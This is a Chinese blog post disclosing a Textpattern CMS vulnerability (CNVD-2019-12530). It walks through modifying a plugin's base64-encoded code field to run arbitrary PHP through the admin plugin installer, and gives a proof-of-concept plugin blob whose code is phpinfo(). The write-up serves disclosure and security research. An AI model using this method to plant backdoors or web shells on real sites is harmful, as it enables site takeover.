TextpatternCMS安装插件时可以安装后门导致getshell

最新推荐文章于 2024-05-09 10:05:10 发布
最新推荐文章于 2024-05-09 10:05:10 发布
阅读量1.2k 收藏
点赞数
分类专栏: PHP代码审计 文章标签: 渗透测试 代码审计 PHP代码审计 getshell 云雕
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yun2diao/article/details/92947262
版权

该漏洞CNVD-ID: CNVD-2019-12530
漏洞提交CNVD后,待CNVD公示才发出本文。
测试环境:windows7 + firefox + Burpsuite + apache2 +php5.6.27 + mysql5.5.53
产品官网:https://textpattern.com/
github: https://github.com/textpattern/textpattern
系统安装环境要求:https://textpattern.com/about/119/system-requirements

一、漏洞分析

/textpattern/index.php?event=plugin 这里可以安装插件,这本是一个自带功能。但如果被恶意利用,则可以安装一个后门导致getshell。
/textpattern/lib/txplib_misc.php 文件中的function load_plugins()函数line 1870 这里会执行插件的代码。
将插件的code部分替换成后门代码后安装即可。
在这里插入图片描述

二、漏洞测试

需要登录管理后台。
官网下载任一插件
https://textpattern.org/plugins/1324/etc_search 这里选择etc_search作演示。
在这里插入图片描述
插件是一个文本文件,分两部分。
第一部分:前面有一段包含插件信息的标题(插件名称、版本和说明、作者名称等);第二部分:base64加密的代码和帮助。
在这里插入图片描述复制所有base64加密的内容,进行解密。
比如这个网站可以解密:http://www.bejson.com/enc/base64/
在这里插入图片描述将解密后的代码复制到notepad++中。
修改 s:4:"code";s:24918:"// TXP 4.6 tag registration……" (共计24918个字符),在notepad里位于第1行----558行。
修改为: s:4:"code";s:10:"phpinfo();";

修改前:
在这里插入图片描述修改后:
在这里插入图片描述将修改后的代码再进行base64加密。
在这里插入图片描述复制新的base64加密内容替换原内容。
在这里插入图片描述来到 /textpattern/index.php?event=plugin 页面安装插件。将处理过的内容粘贴到这里安装。
在这里插入图片描述在这里插入图片描述激活插件。
在这里插入图片描述就可以在很多页面看到结果。
比如后台首页/textpattern/index.php ,或者前台首页。

在这里插入图片描述在这里插入图片描述

三、POC

写入phpinfo()后的插件文本,可直接复制用于测试。

# Name: etc_search v0.9.5 
# Type: Admin/Public plugin
# Search in any table(s)
# Author: Oleg Loukianov
# URL: http://www.iut-fbleau.fr/projet/etc/
# Recommended load order: 7

# .....................................................................
# This is a plugin for Textpattern CMS - http://textpattern.com/
# To install: textpattern > admin > plugins
# Paste the following text into the 'Install plugin' box:
# .....................................................................

YToxMTp7czo0OiJuYW1lIjtzOjEwOiJldGNfc2VhcmNoIjtzOjY6ImF1dGhvciI7czoxNDoiT2xlZyBMb3VraWFub3YiO3M6MTA6ImF1dGhvcl91cmkiO3M6MzY6Imh0dHA6Ly93d3cuaXV0LWZibGVhdS5mci9wcm9qZXQvZXRjLyI7czo3OiJ2ZXJzaW9uIjtzOjU6IjAuOS41IjtzOjExOiJkZXNjcmlwdGlvbiI7czoyMjoiU2VhcmNoIGluIGFueSB0YWJsZShzKSI7czo0OiJjb2RlIjtzOjEwOiJwaHBpbmZvKCk7IjtzOjQ6InR5cGUiO3M6MToiMSI7czo1OiJvcmRlciI7czoxOiI3IjtzOjU6ImZsYWdzIjtzOjE6IjMiO3M6NDoiaGVscCI7czoxMzEzNjoiPGgzPkRlc2NyaXB0aW9uPC9oMz4KCgk8cD5UaGlzIHBsdWdpbiBkaXNwbGF5cyBhIHNlYXJjaCBmb3JtIHNpbWlsYXJseSB0byA8Y29kZT4mbHQ7dHhwOnNlYXJjaF9pbnB1dCAvJmd0OzwvY29kZT4uIElmIEphdmFzY3JpcHQgaXMgZW5hYmxlZCwgYSByZXN1bHRzIGxpc3Qgd2lsbCBmYWRlIGluIGFuZCByZXNpemUgaW4gcmVhbCB0aW1lIGJlbG93IHRoZSBzZWFyY2ggYm94IHdpdGggYSBuaWNlIGFuaW1hdGlvbiBlZmZlY3QgYXMgdGhlIHVzZXIgdHlwZXMgaGlzIHF1ZXJ5LiBXaGVuIHRoZSBzZWFyY2ggYm94IGlzIGVtcHR5LCB0aGUgcmVzdWx0cyBsaXN0IHNocmlua3MgYW5kIGZhZGVzIG91dC48L3A+CgoJPHA+VGhlIHNlYXJjaCBpcyBhZHZhbmNlZCwgaS5lLiAiamFndWFyIHNwZWVkIC1jYXIiIHdpbGwgZGlzcGxheSB0aGUgcmVzdWx0cyBjb250YWluaW5nIHRoZSBzdHJpbmdzICJqYWd1YXIiIGFuZCAic3BlZWQiLCBidXQgbm90ICJjYXIiLiBUaGUgc3ludGF4IGlzIGN1c3RvbWl6YWJsZSBieSBtb2RpZnlpbmcgPGNvZGU+U2VhcmNoIHNldHRpbmdzPC9jb2RlPiBKU09OIGVuY29kZWQgcHJlZmVyZW5jZS4gTW9yZW92ZXIsIHlvdSBjYW4gaW5zdHJ1Y3QgdGhlIHBsdWdpbiB0byBkbyBmYWNldGVkIHNlYXJjaGVzIGFuZCBxdWVyeSBhbnkgZmllbGRzIGluIHlvdXIgdHhwIGRhdGFiYXNlLjwvcD4KCgk8cD5XaGVuIHRoZSB1c2VyIGhpdHMgdGhlIEVudGVyIGtleSBoZSBnZXRzIHJlZGlyZWN0ZWQgdG8gYSB0cmFkaXRpb25hbCBzZWFyY2ggcmVzdWx0cyBwYWdlLCBzbyB0aGUgcGx1Z2luIGFsc28gZGVncmFkZXMgbmljZWx5IGluIG5vbi1KYXZhc2NyaXB0IGJyb3dzZXJzLjwvcD4KCgk8cD5OZWFybHkgZXZlcnl0aGluZyAoaW5wdXQgZm9ybSwgb3V0cHV0IGZvcm0sIGFuaW1hdGlvbiwgc2VhcmNoIHF1ZXJ5KSBpcyBjdXN0b21pemFibGUuIE1vcmVvdmVyLCB5b3UgY2FuIHVzZSA8Y29kZT5ldGNfc2VhcmNoPC9jb2RlPiB0byBxdWVyeSB5b3VyIHR4cCBkYXRhYmFzZSB3aXRob3V0IHVzZXIgaW50ZXJhY3Rpb24sIGV4dGVuZGluZyB0aGUgY2FwYWJpbGl0aWVzIG9mIDxjb2RlPmFydGljbGVfY3VzdG9tPC9jb2RlPiBhbmQgb3RoZXIgbGlzdCB0YWdzLi48L3A+CgoJPGgzPlJlcXVpcmVtZW50czwvaDM+Cgo8cD5UaGUgcGx1Z2luIGlzIGNvbXBvc2VkIG9mIHR3byBmaWxlczogPGNvZGU+ZXRjX3NlYXJjaC50eHQ8L2NvZGU+IGFuZCA8Y29kZT5saXZlc2VhcmNoLmpxdWVyeS5qczwvY29kZT4uIFRoZSBmaXJzdCBvbmUgaXMgY29tcHJlc3NlZCA8Y29kZT5waHA8L2NvZGU+IGZpbGUgdG8gYmUgaW5zdGFsbGVkIGFzIHVzdWFsIGluIDxjb2RlPlBsdWdpbnM8L2NvZGU+IHRhYi4gT24gaW5zdGFsbCBpdCB3aWxsIGNyZWF0ZSBhIDxjb2RlPmV0Y19zZWFyY2g8L2NvZGU+IHRhYmxlIGFuZCB0d28gcHJlZmVyZW5jZXMgdGhhdCB3aWxsIGJlIHJlbW92ZWQgb24gdW5pbnN0YWxsLiBJdCB3aWxsIGFsc28gY3JlYXRlIGFuIGFydGljbGUgZm9ybSAodGhhdCB5b3UgY2FuIG1vZGlmeSkgbmFtZWQgPGNvZGU+ZXRjX3NlYXJjaF9yZXN1bHRzPC9jb2RlPiB0aGF0IHdpbGwgYmUgdXNlZCBhcyBkZWZhdWx0IGxpdmUgc2VhcmNoIG91dHB1dC48L3A+CgoJPGg0PkphdmFzY3JpcHQ8L2g0PgoKCTxwPmpRdWVyeSA8c3Ryb25nPjEuMjwvc3Ryb25nPiBvciBtb3JlIHJlY2VudCBpcyByZXF1aXJlZC48L3A+CgoJPHA+WW91IGNhbiB1c2UgdGhlIDxjb2RlPmpxdWVyeS5qczwvY29kZT4gamF2YXNjcmlwdCBmaWxlIHdoaWNoIGlzIGJ1bmRsZWQgd2l0aCBUZXh0cGF0dGVybiBhbmQgeW91IG5lZWQgdG8gdXBsb2FkIHRoZSBwcm92aWRlZCA8Y29kZT5saXZlc2VhcmNoLmpxdWVyeS5qczwvY29kZT4gZmlsZSB0byB5b3VyIHdlYiBzZXJ2ZXIgKGZvciBleGFtcGxlIGluIGEgZm9sZGVyIGNhbGxlZCAmIzgyMjA7L2pzLyYjODIyMTspIGFuZCBpbmNsdWRlIGJvdGggb2YgdGhlc2UgZmlsZXMgaW4gdGhlIGhlYWRlciBvZiB0aGUgd2ViIHBhZ2VzIHdoZXJlIHlvdSB3YW50IHRvIHVzZSB0aGUgcGx1Z2luOjwvcD4KCjxwcmU+PGNvZGU+Jmx0O3NjcmlwdCB0eXBlPSZxdW90O3RleHQvamF2YXNjcmlwdCZxdW90OyBzcmM9JnF1b3Q7dGV4dHBhdHRlcm4vanF1ZXJ5LmpzJnF1b3Q7Jmd0OyZsdDsvc2NyaXB0Jmd0OwombHQ7c2NyaXB0IHR5cGU9JnF1b3Q7dGV4dC9qYXZhc2NyaXB0JnF1b3Q7IHNyYz0mcXVvdDtqcy9saXZlc2VhcmNoLmpxdWVyeS5qcyZxdW90OyZndDsmbHQ7L3NjcmlwdCZndDsKPC9jb2RlPjwvcHJlPgoKCTxoMz5TeW50YXg8L2gzPgoKPGg0PklucHV0IGZvcm0vbGl2ZSBzZWFyY2g8L2g0Pgo8cHJlPjxjb2RlPiZsdDt0eHA6ZXRjX3NlYXJjaCAvJmd0Owo8L2NvZGU+PC9wcmU+CjxwPm9yIGFzIGNvbnRhaW5lcjo8L3A+CjxwcmU+PGNvZGU+Jmx0O3R4cDpldGNfc2VhcmNoJmd0OwogICZsdDtpbnB1dCBuYW1lPSJhIiAvJmd0OwogICZsdDtpbnB1dCBuYW1lPSJiIiAvJmd0OwogIC4uLgombHQ7L3R4cDpldGNfc2VhcmNoJmd0Owo8L2NvZGU+PC9wcmU+Cgo8aDQ+T3V0cHV0IHJlc3VsdHM8L2g0Pgo8cHJlPjxjb2RlPiZsdDt0eHA6ZXRjX3NlYXJjaF9yZXN1bHRzIC8mZ3Q7CjwvY29kZT48L3ByZT4KPHA+b3IgYXMgY29udGFpbmVyOjwvcD4KPHByZT48Y29kZT4mbHQ7dHhwOmV0Y19zZWFyY2hfcmVzdWx0cyZndDsKICBvdXRwdXQgcGF0dGVybgombHQ7dHhwOmVsc2UgLyZndDsKICAmbHQ7dHhwOnRleHQgaXRlbT0ibm9fc2VhcmNoX21hdGNoZXMiIC8mZ3Q7CiZsdDsvdHhwOmV0Y19zZWFyY2hfcmVzdWx0cyZndDsKPC9jb2RlPjwvcHJlPgoKCTxoMz5BdHRyaWJ1dGVzIG9mIDxjb2RlPmV0Y19zZWFyY2g8L2NvZGU+IHRhZzwvaDM+CgoJPGg0PlJlcXVpcmVkPC9oND4KCgk8cD5ub25lLjwvcD4KCgk8aDQ+T3B0aW9uYWw8L2g0PgoKCTx1bD4KCQk8bGk+PHN0cm9uZz5pZDwvc3Ryb25nPjogQ29tbWEtc2VwYXJhdGVkIGxpc3Qgb2YgcXVlcnkgaWRlbnRpZmllcnMgKHNlZSBiZWxvdyksIGRlZmF1bHQgaXMgPGNvZGU+MDwvY29kZT4gKGRlZmF1bHQgc2VhcmNoKS48L2xpPgoJCTxsaT48c3Ryb25nPmxpdmU8L3N0cm9uZz46IE1pbGxpc2Vjb25kcyBvZiB1c2VyIGluYWN0aXZpdHkgYmVmb3JlIGxpdmUgc2VhcmNoIHN0YXJ0cywgPGNvZGU+NjAwPC9jb2RlPiBieSBkZWZhdWx0LiBTZXQgaXQgdG8gPGNvZGU+MDwvY29kZT4gdG8gZGlzYWJsZSB0aGUgbGl2ZSBzZWFyY2gsIG9yIHRvIDxjb2RlPi02MDA8L2NvZGU+IHRvIG1ha2UgdGhlIHJlc3VsdHMgcGVyc2lzdCBvbiB0aGUgc2NyZWVuIGV2ZW4gYWZ0ZXIgbG9vc2luZyB0aGUgZm9jdXMuPC9saT4KCQk8bGk+PHN0cm9uZz5taW5sZW5ndGg8L3N0cm9uZz46IE1pbmltYWwgbGVuZ3RoIG9mIHVzZXIgaW5wdXQgYmVmb3JlIGxpdmUgc2VhcmNoIHN0YXJ0cywgPGNvZGU+MTwvY29kZT4gYnkgZGVmYXVsdC48L2xpPgoJCTxsaT48c3Ryb25nPm1hdGNoPC9zdHJvbmc+OiBTZWFyY2ggbW9kZSwgc2V0IGl0IHRvIDxjb2RlPmV4YWN0PC9jb2RlPiBpZiBuZWNlc3NhcnkuPC9saT4KCQk8bGk+PHN0cm9uZz5mb3JtYXQ8L3N0cm9uZz46IEFsbG93cyB0byBnbHVlIG11bHRpcGxlIFVSTCA8Y29kZT57dmFyaWFibGVzfTwvY29kZT4gKGdlbmVyYWxseSBwcm9kdWNlZCBieSA8Y29kZT4mbHQ7dHhwOmV0Y19zZWFyY2ggLyZndDs8L2NvZGU+IHVzZWQgYXMgY29udGFpbmVyKSBpbnRvIG9uZSBzZWFyY2ggc3RyaW5nLiBGb3IgZXhhbXBsZSwgPGNvZGU+Zm9ybWF0PSJ7cX0gQHtjfSI8L2NvZGU+IHdpbGwgcGFzcyB0aGUgc3RyaW5nIDxjb2RlPj9jPXRpcHMmcT1wYWcmLi4uPC9jb2RlPiBhcyAicGFnIEB0aXBzIiBzZWFyY2ggcXVlcnkgdG8gPGNvZGU+ZXRjX3NlYXJjaDwvY29kZT4uIERlZmF1bHQgaXMgPGNvZGU+e3F9PC9jb2RlPiwgdGhlIHZhbHVlIG9mIHR4cCBzZWFyY2ggc3RyaW5nIHBhcmFtZXRlci48L2xpPgoJCTxsaT48c3Ryb25nPmFjdGlvbjwvc3Ryb25nPjogVVJMIG9mIHRoZSBwYWdlIHRvIHJlZGlyZWN0IHRoZSB1c2VyIHRvIHdoZW4gaGUgaGl0cyB0aGUgRW50ZXIga2V5LCBpbiBvcmRlciB0byBkaXNwbGF5IHRoZSBzdGFuZGFyZCBzZWFyY2ggcmVzdWx0cyBwYWdlLiBEZWZhdWx0IGlzIHRoZSBob21lIHBhZ2UuPC9saT4KCQk8bGk+PHN0cm9uZz5odG1sX2lkPC9zdHJvbmc+OiA8c3BhbiBjbGFzcz0iY2FwcyI+SFRNTDwvc3Bhbj4gPGNvZGU+aWQ8L2NvZGU+IGF0dHJpYnV0ZSB0aGF0IHdpbGwgYmUgYXBwbGllZCB0byB0aGUgc2VhcmNoIGZvcm0uIERlZmF1bHQgaXMgPGNvZGU+bGl2ZV9zZWFyY2hfW3NvbWVfcmFuZG9tX2lkXTwvY29kZT4uPC9saT4KCQk8bGk+PHN0cm9uZz5jbGFzczwvc3Ryb25nPjogPHNwYW4gY2xhc3M9ImNhcHMiPkhUTUw8L3NwYW4+IDxjb2RlPmNsYXNzPC9jb2RlPiBhdHRyaWJ1dGUgb2YgdGhlIHNlYXJjaCBmb3JtLCA8Y29kZT5sc19zZWFyY2g8L2NvZGU+IGJ5IGRlZmF1bHQuPC9saT4KCQk8bGk+PHN0cm9uZz50YXJnZXQ8L3N0cm9uZz46IGpRdWVyeSBzZWxlY3Rvciwgc2V0IGl0IGlmIHlvdSB3YW50IHRvIGRpc3BsYXkgbGl2ZSBzZWFyY2ggcmVzdWx0cyBlbHNld2hlcmUuPC9saT4KCQk8bGk+PHN0cm9uZz5mb3JtPC9zdHJvbmc+OiBPcHRpb25hbCBUZXh0cGF0dGVybiBmb3JtIGZvciBsaXZlIHNlYXJjaCByZXN1bHRzIG91dHB1dC48L2xpPgoJCTxsaT48c3Ryb25nPmxhYmVsPC9zdHJvbmc+OiBEaXNwbGF5cyBhIGxhYmVsIGFib3ZlIHRoZSBzZWFyY2ggYm94IHdpdGggdGhlIHNwZWNpZmllZCB0ZXh0LiBEZWZhdWx0IGlzICYjODIyMDtzZWFyY2gmIzgyMjE7IHN0cmluZyBsb2NhbGl6ZWQgaW4gdGhlIGxhbmd1YWdlIG9mIHlvdXIgVGV4dHBhdHRlcm4gaW5zdGFsbGF0aW9uLjwvbGk+CgkJPGxpPjxzdHJvbmc+c2l6ZTwvc3Ryb25nPjogU2l6ZSBvZiB0aGUgc2VhcmNoIGJveCAobnVtYmVyIG9mIGNoYXJhY3RlcnMpLjwvbGk+CgkJPGxpPjxzdHJvbmc+cGxhY2Vob2xkZXI8L3N0cm9uZz46IEludml0YXRpb24gdGV4dCB0aGF0IHdpbGwgZGUgZGlzcGxheWVkIGluIHRoZSBib3guIFRoaXMgdGV4dCBkaXNhcHBlYXJzIHdoZW4gdXNlciBoYXMgdHlwZWQgc29tZXRoaW5nIGludG8gaXQuIERlZmF1bHQgaXMgZW1wdHkuPC9saT4KCQk8bGk+PHN0cm9uZz5saW1pdDwvc3Ryb25nPjogTWF4aW11bSBudW1iZXIgb2YgcmVzdWx0cyBpbiB0aGUgbGl2ZSByZXN1bHRzIGxpc3QuIERlZmF1bHQgaXMgPGNvZGU+MDwvY29kZT4gKG5vIGxpbWl0KS48L2xpPgoJCTxsaT48c3Ryb25nPndyYXB0YWc8L3N0cm9uZz46IDxzcGFuIGNsYXNzPSJjYXBzIj5IVE1MPC9zcGFuPiB0YWcgdG8gd3JhcCB0aGUgc2VhcmNoIHJlc3VsdHMgd2l0aCwgaW5zaWRlIHRoZSBmb3JtLiBEZWZhdWx0IGlzIGVtcHR5LjwvbGk+CgkJPGxpPjxzdHJvbmc+YnJlYWs8L3N0cm9uZz46IDxzcGFuIGNsYXNzPSJjYXBzIj5IVE1MPC9zcGFuPiB0YWcgdG8gYmUgdXNlZCBmb3IgbGluZSBicmVha3MgaW4gdGhlIGNvbnRlbnQgaW5zaWRlIHRoZSBsaXZlIHJlc3VsdHMgbGlzdCwgd2l0aG91dCBicmFja2V0cy4gRGVmYXVsdCBpcyA8Y29kZT5icjwvY29kZT4uPC9saT4KCTwvdWw+Cgo8aDM+QWRtaW4tc2lkZSBzZXR0aW5nczwvaDM+Cgo8cD5HbyB0byA8Y29kZT5FeHRlbnNpb25zL2V0Y19zZWFyY2g8L2NvZGU+IHRvIGNoYW5nZSB0aGVtLjwvcD4KCjxoND5TZWFyY2ggc2V0dGluZ3M8L2g0Pgo8dWw+CjxsaT48c3Ryb25nPkxvZ2ljYWwgb3BlcmF0aW9uczwvc3Ryb25nPjogSlNPTi1lbmNvZGVkIG9iamVjdCBjb250YWluaW5nIE15U1FMIG9wZXJhdG9ycyB0byBiZSB1c2VkIGluIHNlYXJjaCBxdWVyaWVzLjwvbGk+CjwvdWw+Cgo8aDQ+U2VhcmNoIGZvcm1zPC9oND4KPHVsPgo8bGk+PHN0cm9uZz5jb250ZXh0PC9zdHJvbmc+OiBPbmUgb2YgPGNvZGU+YXJ0aWNsZSB8IGZpbGUgfCBpbWFnZSB8IGxpbms8L2NvZGU+LCByZXByZXNlbnRpbmcgdGhlIHRhYmxlIHRvIHNlYXJjaCBpbiwgb3IgPGNvZGU+Y3VzdG9tPC9jb2RlPi4gSWYgbm90IGN1c3RvbSwgeW91IGNhbiB1c2UgKHNvbWUgb2YpIGNvbnRleHQgdGFncyBpbiBmb3Jtcywgc2VlIGJlbG93LjwvbGk+CgkJPGxpPjxzdHJvbmc+cXVlcnk8L3N0cm9uZz46IEEgc3RyaW5nIHBhdHRlcm5zIHJlcHJlc2VudGluZyBhIHZhbGlkIE15U1FMIFNFTEVDVCBxdWVyeSwgd2l0aCBzcGVjaWFsbHkgY3JhZnRlZCBXSEVSRSBjbGF1c2UuIEl0IGlzIG9mIHRoZSBmb3JtIDxjb2RlPlNFTEVDVCAuLi4gV0hFUkUge1s/cGFyYW06Ol1tYXRjaDE7bWF0Y2gyOy4uLn0gQU5EL09SIG90aGVyX2NyaXRlcmlhIC4uLjwvY29kZT4uIFRoZSA8Y29kZT57bWF0Y2h9PC9jb2RlPiB0b2tlbiB3aWxsIGJlIHJlcGxhY2VkIGJ5IHRoZSBwbHVnaW4gd2l0aCBhcHByb3ByaWF0ZSBzdHJpbmcuIEEgcXVlcnkgcGF0dGVybiBjYW4gYmUgcmVkdWNlZCB0byA8Y29kZT57bWF0Y2gxO21hdGNoMjsuLi59IC4uLjwvY29kZT4gaWYgc29tZSBub24tY3VzdG9tIGNvbnRleHQgaXMgc2V0LjxiciAvPgpIZXJlIDxjb2RlPnBhcmFtPC9jb2RlPiBpcyBhIHVybCB2YXJpYWJsZSB0byBiZSB1c2VkIGluIHRoZSBpdGVtLiBJZiBvbWl0dGVkLCB0aGUgZGVmYXVsdCBzZWFyY2ggcGFyYW1ldGVyIDxjb2RlPnE8L2NvZGU+IHdpbGwgYmUgdXNlZC48YnIgLz4KRWFjaCA8Y29kZT5tYXRjaDwvY29kZT4gaXRlbSBpcyBhIHN0cmluZyA8Y29kZT5maWVsZHM6OnBhdHRlcm46OmNvbmRpdGlvbjwvY29kZT4sIHdoZXJlCjx1bD4KPGxpPjxjb2RlPmZpZWxkczwvY29kZT4gaXMgYSBjb21tYS1zZXBhcmF0ZWQgbGlzdCBvZiBkYiBmaWVsZHM7PC9saT4KPGxpPjxjb2RlPnBhdHRlcm48L2NvZGU+IGlzIGEgcmVnZXhwIHRvIG1hdGNoIHNlYXJjaCBxdWVyeSBhZ2FpbnN0LCA8Y29kZT4vXi4rJC9zPC9jb2RlPiAoYW55IHF1ZXJ5KSBieSBkZWZhdWx0OzwvbGk+CjxsaT48Y29kZT5jb25kaXRpb248L2NvZGU+IGlzIGEgTXlTUUwgV0hFUkUgY2xhdXNlIChpdHMgZGVmYXVsdCB2YWx1ZSBpcyA8Y29kZT57Kn0gTElLRSAlc2VhcmNoX3Rlcm0lPC9jb2RlPikgdG8gZmlsdGVyIDxjb2RlPmZpZWxkczwvY29kZT4gd2l0aC4gSGVyZSwgIHRoZSA8Y29kZT57Kn08L2NvZGU+IHRva2VuIHdpbGwgYmUgcmVwbGFjZWQgYnkgPGNvZGU+ZmllbGRzPC9jb2RlPiBuYW1lcywgYW5kIDxjb2RlPiRuPC9jb2RlPiB0b2tlbnMgd2lsbCBiZSB0YWtlbiBmcm9tIHNlYXJjaCBxdWVyaWVzIG1hdGNoaW5nIDxjb2RlPnBhdHRlcm48L2NvZGU+LjwvbGk+CjwvdWw+CgkJPGxpPjxzdHJvbmc+Zm9ybTwvc3Ryb25nPjogVHdvIG91dHB1dCBmb3JtcyB0byB1c2UgZm9yIGRpc3BsYXlpbmcgdGhlIHJlc3VsdHMsIGluIGxpdmUgYW5kIHN0YW5kYXJkIG1vZGUuIElmIGVtcHR5LCB3aWxsIGJlIGFzc2lnbmVkIHRoZSB2YWx1ZSBvZiA8Y29kZT5ldGNfc2VhcmNoX3Jlc3VsdHMsIHNlYXJjaF9yZXN1bHRzPC9jb2RlPi48L2xpPgo8bGk+RmluYWxseSwgPHN0cm9uZz5jb250ZW50PC9zdHJvbmc+IGNvbnNpc3RzIG9mIHR3byBvdXRwdXQgcGF0dGVybnMgd2hlcmUgYWxsIG9jY3VycmVuY2VzIG9mIDxjb2RlPntmaWVsZH08L2NvZGU+IHdpbGwgYmUgcmVwbGFjZWQgYnkgdGhlIGNvcnJlc3BvbmRpbmcgKGVzY2FwZWQpIGZpZWxkIHZhbHVlLiBUaGUgZmlyc3QgcGF0dGVybiB3aWxsIGJlIHVzZWQgZm9yIHRoZSBsaXZlIHNlYXJjaCwgdGhlIHNlY29uZCBvbmUgZm9yIHRoZSBzdGFuZGFyZCBzZWFyY2guPC9saT48L3VsPgo8L2xpPgo8L3VsPgoKCTxoMz5FeGFtcGxlczwvaDM+CjxwPkJ5IGRlZmF1bHQsIDxjb2RlPmV0Y19zZWFyY2g8L2NvZGU+IGFjdHMgbGlrZSB0aGUgYnVpbHQtaW4gVGV4dHBhdHRlcm4gc2VhcmNoLCBxdWVyeWluZyBhcnRpY2xlcyA8Y29kZT5UaXRsZTwvY29kZT4gYW5kIDxjb2RlPkJvZHk8L2NvZGU+LiBJZiB5b3Ugd2FudCB0byBtYWtlIHNlYXJjaGFibGUgYWxzbyA8Y29kZT5LZXl3b3JkczwvY29kZT4gYW5kIDxjb2RlPkV4Y2VycHQ8L2NvZGU+LCBjcmVhdGUgYW4gYXJ0aWNsZSBxdWVyeSA8Y29kZT57VGl0bGUsQm9keSxLZXl3b3JkcyxFeGNlcnB0fTwvY29kZT4gKHNheSwgbnVtYmVyIDEpLCBhbmQgY2FsbDwvcD4KPHByZT48Y29kZT4mbHQ7dHhwOmV0Y19zZWFyY2ggaWQ9IjEiIC8mZ3Q7PC9jb2RlPjwvcHJlPgoKPHA+U3VwcG9zZSBub3cgdGhhdCB5b3Ugd2lzaCB0byBleHRlbmQgdGhlIGRlZmF1bHQgVGV4dHBhdHRlcm4gc2VhcmNoIHdpdGggZmFjZXRlZCBzZWFyY2ggZm9yIHNvbWUgdGV4dCBpbiBpbWFnZXMgPGNvZGU+Y2FwdGlvbjwvY29kZT4gYXR0cmlidXRlLCBhbmQgZGlzcGxheSB0aGUgdGl0bGVzIG9mIHRoZSBhcnRpY2xlcyB3aGljaCBhcmUgYXNzb2NpYXRlZCAodmlhIEFydGljbGUgaW1hZ2UpIHdpdGggdGhlIG1hdGNoaW5nIGltYWdlcy4gVG8gaW5kaWNhdGUgdGhhdCB5b3UgYXJlIHNlYXJjaGluZyBpbiBjYXB0aW9ucywgeW91IGRlY2lkZSB0byBwcmVmaXggdGVybXMgYnkgPGNvZGU+Y2FwOjwvY29kZT4uIFRoZW4geW91IGNhbiBjcmVhdGUgdGhlIGZvbGxvd2luZyBhcnRpY2xlIGNvbnRleHQgcXVlcnkgKHNheSwgbnVtYmVyIDIpIGFuZCBmb3Jtczo8L3A+Cgo8cHJlPjxjb2RlPnF1ZXJ5OiBTRUxFQ1QgdHhwLiosaW1nLmNhcHRpb24gRlJPTSB0ZXh0cGF0dGVybiB0eHAgSk9JTiB0eHBfaW1hZ2UgaW1nIE9OIEZJTkRfSU5fU0VUKGltZy5pZCx0eHAuSW1hZ2UpIFdIRVJFIHtpbWcuY2FwdGlvbjo6L15jYXA6KC4rKSQvOjp7Kn0gTElLRSAnJSQxJSd9CmxpdmUgZm9ybTogJmx0O2EgaHJlZj0nJmx0O3R4cDpwZXJtbGluayAvJmd0OycgdGl0bGU9J3tjYXB0aW9ufScmZ3Q7Jmx0O3R4cDp0aXRsZSAvJmd0OyZsdDsvYSZndDsKc3RhdGljIGZvcm06ICZsdDtoMyZndDsmbHQ7dHhwOnBlcm1saW5rJmd0OyZsdDt0eHA6dGl0bGUgLyZndDsmbHQ7L3R4cDpwZXJtbGluayZndDsmbHQ7L2gzJmd0OyZsdDt0eHA6ZXhjZXJwdCAvJmd0Owo8L2NvZGU+PC9wcmU+CiA8cD5hbmQgdXNlIDxjb2RlPiZsdDt0eHA6ZXRjX3NlYXJjaCBpZD0iMCwyIiAvJmd0OzwvY29kZT4uPC9wPgoKPGgzPlRoZSA8Y29kZT5ldGNfc2VhcmNoX3Jlc3VsdHM8L2NvZGU+IHRhZzwvaDM+Cgo8cD5Zb3UgY2FuIHJlcGxhY2UgdGhlIGRlZmF1bHQgKG5vbi1saXZlKSBUWFAgc2VhcmNoIHdpdGggPGNvZGU+Jmx0O3R4cDpldGNfc2VhcmNoX3Jlc3VsdHMgLyZndDs8L2NvZGU+IGJ5IHBsYWNpbmcgdGhpcyB0YWcgaW5zdGVhZCBvZiA8Y29kZT4mbHQ7dHhwOmFydGljbGUgLyZndDs8L2NvZGU+IGluIDxjb2RlPmlmX3NlYXJjaDwvY29kZT4gc2VjdGlvbiBvZiB5b3VyIHBhZ2VzLiBUaGUgdGFnIGN1cnJlbnRseSBhY2NlcHRzIHRoZSBzdGFuZGFyZCA8Y29kZT5odG1sX2lkPC9jb2RlPiwgPGNvZGU+Zm9ybTwvY29kZT4sIDxjb2RlPndyYXB0YWc8L2NvZGU+LCA8Y29kZT5icmVhazwvY29kZT4gYW5kIDxjb2RlPmxpbWl0PC9jb2RlPiBhdHRyaWJ1dGVzLiBJZiA8Y29kZT5mb3JtPC9jb2RlPiBvciA8Y29kZT5jb250ZW50PC9jb2RlPiBhcmUgc2V0LCB0aGV5IHdpbGwgYmUgY29tbW9uIHRvIGFsbCBzZWFyY2ggcXVlcmllcywgb3ZlcndyaXRpbmcgdGhlaXIgb3duIGZvcm1zLjwvcD4KCjxwPlRoZSA8Y29kZT5pZDwvY29kZT4gYXR0cmlidXRlIGFsbG93cyB0byByZXN0cmljdCBzZWFyY2ggdG8gYSBsaXN0IG9mIGNvbW1hLXNlcGFyYXRlZCBzZWFyY2ggZm9ybSBpZHMuIElmIHRoaXMgbGlzdCBpcyBwcmVjZWRlZCBieSA8Y29kZT4tPC9jb2RlPiwgdGhlIGNvcnJlc3BvbmRpbmcgZm9ybXMgd2lsbCBiZSBleGNsdWRlZC4gWW91IGNhbiBwbGFjZSB0d28gb3IgbW9yZSBtdXR1YWxseSBleGNsdXNpdmUgPGNvZGU+Jmx0O3R4cDpldGNfc2VhcmNoX3Jlc3VsdHMgLyZndDs8L2NvZGU+IHRhZ3Mgb24gdGhlIHBhZ2U6PC9wPgo8cHJlPjxjb2RlPiZsdDt0eHA6ZXRjX3NlYXJjaF9yZXN1bHRzIGlkPSIxLDIiIGZvcm09ImZvcm0xIiAvJmd0OwombHQ7dHhwOmV0Y19zZWFyY2hfcmVzdWx0cyBpZD0iMyIgZm9ybT0iZm9ybTIiIC8mZ3Q7CjwvY29kZT48L3ByZT4KCjxwPlRoZSA8Y29kZT5xdWVyeTwvY29kZT4gYXR0cmlidXRlIGFsbG93cyB0byBwYXNzIGEgc2VhcmNoIHN0cmluZyBkaXJlY3RseSB0byA8Y29kZT4mbHQ7dHhwOmV0Y19zZWFyY2hfcmVzdWx0cyAvJmd0OzwvY29kZT4uIEZvciBleGFtcGxlLCA8Y29kZT5xdWVyeT0icmVkIGJsdWUiPC9jb2RlPiB3aWxsIGJlIHRyZWF0ZWQgYXMgPGN